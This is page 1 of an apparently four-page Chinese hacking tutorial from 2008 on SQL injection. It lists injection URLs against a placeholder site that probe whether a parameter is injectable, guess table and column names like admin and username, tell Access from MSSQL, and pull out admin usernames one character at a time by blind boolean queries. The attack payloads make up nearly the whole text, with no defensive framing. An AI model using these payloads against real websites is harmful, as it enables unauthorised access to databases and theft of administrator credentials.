开发学院网络安全黑客技术 快速学习,理解.SQL注入技术 阅读

快速学习,理解.SQL注入技术

 2008-10-27 16:51:19 来源:WEB开发网   
核心提示:检测可否注入http://127.0.0.1/xx?id=11 and 1=1 (正常页面)http://127.0.0.1/xx?id=11 and 1=2 (出错页面)检测表段的http://127.0.0.1/xx?id=11 and exists (select * from admin)检测字段的http:/

检测可否注入

http://127.0.0.1/xx?id=11 and 1=1 (正常页面)

http://127.0.0.1/xx?id=11 and 1=2 (出错页面)

检测表段的

http://127.0.0.1/xx?id=11 and exists (select * from admin)

检测字段的

http://127.0.0.1/xx?id=11 and exists (select username from admin)

检测ID

http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)

检测长度的

http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)

检测长度的

http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)

检测是否为MSSQL数据库

http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)

检测是否为英文

(ACCESS数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)

(MSSQL数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)

检测英文的范围

(ACCESS数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)

(MSSQL数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)

检测那个字符

(ACCESS数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)

1 2 3 4  下一页

Tags:快速 学习 理解

编辑录入:爽爽 [复制链接] [打 印]
[]
  • 好
  • 好的评价 如果觉得好,就请您
      0%(0)
  • 差
  • 差的评价 如果觉得差,就请您
      0%(0)
赞助商链接